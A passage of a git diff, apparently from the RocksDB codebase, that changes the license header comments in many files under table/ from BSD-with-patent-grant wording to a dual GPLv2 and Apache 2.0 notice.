--- a/table/format.cc
+++ b/table/format.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/format.h b/table/format.h
index aa0ebfbaf52..d89b1d312cf 100644
--- a/table/format.h
+++ b/table/format.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/full_filter_bits_builder.h b/table/full_filter_bits_builder.h
index c47a7475436..b3be7e897f0 100644
--- a/table/full_filter_bits_builder.h
+++ b/table/full_filter_bits_builder.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc
index 895c713b48d..5739494e8dd 100644
--- a/table/full_filter_block.cc
+++ b/table/full_filter_block.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/full_filter_block.h"
diff --git a/table/full_filter_block.h b/table/full_filter_block.h
index 2121df79b18..be27c58b61d 100644
--- a/table/full_filter_block.h
+++ b/table/full_filter_block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/table/full_filter_block_test.cc b/table/full_filter_block_test.cc
index 191a8243ffe..5fbda4c6f03 100644
--- a/table/full_filter_block_test.cc
+++ b/table/full_filter_block_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/full_filter_block.h"
diff --git a/table/get_context.cc b/table/get_context.cc
index 060bd62b96d..2b49eba6abd 100644
--- a/table/get_context.cc
+++ b/table/get_context.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/get_context.h"
 #include "db/merge_helper.h"
diff --git a/table/get_context.h b/table/get_context.h
index d58753346e6..ee8a3beab9f 100644
--- a/table/get_context.h
+++ b/table/get_context.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/index_builder.cc b/table/index_builder.cc
index a67b97895c0..cdf20aee920 100644
--- a/table/index_builder.cc
+++ b/table/index_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/index_builder.h b/table/index_builder.h
index 43d484d7686..d591e0e533c 100644
--- a/table/index_builder.h
+++ b/table/index_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/internal_iterator.h b/table/internal_iterator.h
index 62248007c99..2bfdb7d952a 100644
--- a/table/internal_iterator.h
+++ b/table/internal_iterator.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/table/iter_heap.h b/table/iter_heap.h
index 24ef64230b7..74c06caeaf8 100644
--- a/table/iter_heap.h
+++ b/table/iter_heap.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/table/iterator.cc b/table/iterator.cc
index b7b8dc1c1b3..23a84b59e0f 100644
--- a/table/iterator.cc
+++ b/table/iterator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/iterator_wrapper.h b/table/iterator_wrapper.h
index 08be059f0da..f14acdb9bf6 100644
--- a/table/iterator_wrapper.h
+++ b/table/iterator_wrapper.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/merger_test.cc b/table/merger_test.cc
index 4b6cbf4bd6d..379a6f412d5 100644
--- a/table/merger_test.cc
+++ b/table/merger_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/table/merging_iterator.cc b/table/merging_iterator.cc
index e36f80ad3de..da30e1e6352 100644
--- a/table/merging_iterator.cc
+++ b/table/merging_iterator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/merging_iterator.h b/table/merging_iterator.h
index 833de29cf98..48a28d86fd9 100644
--- a/table/merging_iterator.h
+++ b/table/merging_iterator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc
index 229b7a7cfaa..5946e40fe0b 100644
--- a/table/meta_blocks.cc
+++ b/table/meta_blocks.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/meta_blocks.h"
 #include
diff --git a/table/meta_blocks.h b/table/meta_blocks.h
index 5caba4c41f3..ddb685360d6 100644
--- a/table/meta_blocks.h
+++ b/table/meta_blocks.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/mock_table.cc b/table/mock_table.cc
index 25a5200ecfb..9de04d69c60 100644
--- a/table/mock_table.cc
+++ b/table/mock_table.cc
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/mock_table.h"
diff --git a/table/mock_table.h b/table/mock_table.h
index 200de28780f..0583139c6bf 100644
--- a/table/mock_table.h
+++ b/table/mock_table.h
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc
index 138a7ed01ba..2b330039e50 100644
--- a/table/partitioned_filter_block.cc
+++ b/table/partitioned_filter_block.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/partitioned_filter_block.h"
diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h
index 97bbd1ea8c2..6c4a5d7b9d2 100644
--- a/table/partitioned_filter_block.h
+++ b/table/partitioned_filter_block.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc
index cbf8c493c98..a49143dae2f 100644
--- a/table/partitioned_filter_block_test.cc
+++ b/table/partitioned_filter_block_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/table/persistent_cache_helper.cc b/table/persistent_cache_helper.cc
index 1a8e83788aa..ec1cac0b9db 100644
--- a/table/persistent_cache_helper.cc
+++ b/table/persistent_cache_helper.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "table/persistent_cache_helper.h"
 #include "table/block_based_table_reader.h"
diff --git a/table/persistent_cache_helper.h b/table/persistent_cache_helper.h
index 425a80c58c2..ac8ee0389bb 100644
--- a/table/persistent_cache_helper.h
+++ b/table/persistent_cache_helper.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/persistent_cache_options.h b/table/persistent_cache_options.h
index 9d349faa705..acd640369ad 100644
--- a/table/persistent_cache_options.h
+++ b/table/persistent_cache_options.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/plain_table_builder.cc b/table/plain_table_builder.cc
index e7ea40e0e4c..964804358a6 100644
--- a/table/plain_table_builder.cc
+++ b/table/plain_table_builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "table/plain_table_builder.h"
diff --git a/table/plain_table_builder.h b/table/plain_table_builder.h
index a8759276eab..1d1f6c7586e 100644
--- a/table/plain_table_builder.h
+++ b/table/plain_table_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/table/plain_table_index.cc b/table/plain_table_index.cc
index 3d84d124aa0..39a6b53d602 100644
--- a/table/plain_table_index.cc
+++ b/table/plain_table_index.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/table/plain_table_index.h b/table/plain_table_index.h
index 98ec505db27..2916be4192b 100644
--- a/table/plain_table_index.h
+++ b/table/plain_table_index.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc
index 89b70022812..3e87c03d13f 100644
--- a/table/plain_table_key_coding.cc
+++ b/table/plain_table_key_coding.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "table/plain_table_key_coding.h"
diff --git a/table/plain_table_key_coding.h b/table/plain_table_key_coding.h
index a23f782cd0d..321e0aed594 100644
--- a/table/plain_table_key_coding.h
+++ b/table/plain_table_key_coding.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/table/scoped_arena_iterator.h b/table/scoped_arena_iterator.h
index d6183b0c084..1de570dc7f2 100644
--- a/table/scoped_arena_iterator.h
+++ b/table/scoped_arena_iterator.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/table/sst_file_writer.cc b/table/sst_file_writer.cc
index 5d7a46c606c..adcd91f92ea 100644
--- a/table/sst_file_writer.cc
+++ b/table/sst_file_writer.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/sst_file_writer.h"
diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h
index 77ca1c81882..ce3a45f5a74 100644
--- a/table/sst_file_writer_collectors.h
+++ b/table/sst_file_writer_collectors.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/table/table_builder.h b/table/table_builder.h
index 4e413b41110..ef2e608ed46 100644
--- a/table/table_builder.h
+++ b/table/table_builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/table_properties.cc b/table/table_properties.cc
index f3373ba539d..ef77ae566aa 100644
--- a/table/table_properties.cc
+++ b/table/table_properties.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/table_properties.h"
 #include "port/port.h"
diff --git a/table/table_properties_internal.h b/table/table_properties_internal.h
index 65b092fcebf..2a89427341b 100644
--- a/table/table_properties_internal.h
+++ b/table/table_properties_internal.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/table/table_reader.h b/table/table_reader.h
index 1ffe6667ce9..5f47468e6de 100644
--- a/table/table_reader.h
+++ b/table/table_reader.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/table_reader_bench.cc b/table/table_reader_bench.cc
index ff2ce43faee..85e48c1fea7 100644
--- a/table/table_reader_bench.cc
+++ b/table/table_reader_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef GFLAGS
 #include
diff --git a/table/table_test.cc b/table/table_test.cc
index 1e91361d07f..c55eb425576 100644
--- a/table/table_test.cc
+++ b/table/table_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/two_level_iterator.cc b/table/two_level_iterator.cc
index d10e2d0e768..2236a2a726a 100644
--- a/table/two_level_iterator.cc
+++ b/table/two_level_iterator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/table/two_level_iterator.h b/table/two_level_iterator.h
index 91d8fa83106..34b33c83f65 100644
--- a/table/two_level_iterator.h
+++ b/table/two_level_iterator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
